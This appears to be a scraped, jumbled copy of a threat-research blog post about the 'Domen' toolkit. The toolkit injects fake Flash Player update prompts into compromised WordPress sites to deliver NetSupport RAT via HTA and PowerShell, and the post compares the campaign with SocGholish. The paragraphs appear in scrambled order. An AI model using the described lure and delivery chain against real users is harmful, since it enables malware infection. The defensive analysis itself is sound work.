![]() ![]() Link with EITestĪt about the same time as we were reviewing this new redirection chain, we saw this other one identified by tagged as FontPack that is reminiscent of the HoeflerText social engineering toolkit reported by Proofpoint in early 2017. However, the fact that both templates deliver the same RAT is something noteworthy. Similarities with SocGholish could be simply due to the threat actor getting inspired by what has been done before. They double compressed the file, first as zip and then as rar. Side note: A publicly saved VirusTotal graph (saved screenshot here) shows that the threat actors also used DropBox at some point to host the netSupport RAT. download a fake update as 'download.hta'.abuse or abused a cloud hosting platform (Bitbucket, Dropbox).can occasionally be found on the same compromised host. ![]() Figure 9: Comparing two campaigns by looking at the injected JavaScriptĪlthough the templates for SocGholish and the new campaign are different, they both: This can be confirmed by looking at the injected code in two different pieces of JavaScript, the first one being flagged by the EmergingThreats ruleset. This hacked site actually hosts two different campaigns and based on some browser and network fingerprinting, you might be served one or the other. The reason why the sandbox is flagging SocGholish is because the compromised site contains artifacts related to it, and does, in some circumstances, actually redirect to it: Figure 8: SocGholish template We recently noticed a tweet that reported SocGholish via the compromised site fistfuloftalentcom, although the linked sandbox report shows the same template we described earlier, which is different than the SocGholish one: Figure 7: New theme erroneously associated with SocGholish It leverages compromised websites and performs some of the most creative fingerprinting checks we've seen, before delivering its payload (NetSupport RAT). In late 2018, we documented a malicious redirection campaign that we dubbed FakeUpdates, also known as SocGholish based on a ruleset from EmergingThreats. That payload is a package that contains the NetSupport RAT: Figure 5: Process tree showing execution flow Figure 6: Observed HTTP traffic confirming NetSupport RAT infection Link with "FakeUpdates" aka SocGholish Figure 4: Malicious mshta script retrieves payload from external domain Upon execution, that HTA script will run PowerShell and connect to xyxyxyxyxyxyz in order to retrieve a malware payload. Note that the domain wheelslistnet belongs to a legitimate website that has been hacked and where an iframe from chrom-updateonline is placed as a layer above the normal page: Figure 2: Deobfuscated code found on compromised site that loads malicious iframeĬlicking the UPDATE or LATER button downloads a file called 'download.hta', indexed on Atlassian's Bitbucket platform and hosted on an Amazon server (bbuseruploads.s3.): Figure 3: Bitbucket project from user 'Garik' Here, users are tricked into downloading and running a Flash Player update: Figure 1: Fake Flash Player update notification The premise looks typical of many other social engineering toolkit templates we've come across before. In this blog we describe its tactics, techniques, and procedures (TTPs) that remind us of some past and current social engineering campaigns. Loaded as an iframe from compromised websites (most of them running WordPress) and displayed over top as an additional layer, it entices victims to install so-called updates that instead download the NetSupport remote administration tool. The toolkit, which we dub Domen, is built around a detailed client-side script that acts as a framework for different fake update templates, customized for both desktop and mobile users in up to 30 languages. We recently identified a website compromise with a scheme we had not seen before it's part of a campaign using a social engineering toolkit that has drawn over 100,000 visits in the past few weeks. Perhaps the more popular ones are those encountered via malvertising, or hacked websites that push fraudulent updates. ![]() Some of the most common web threats we track have a social engineering component. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |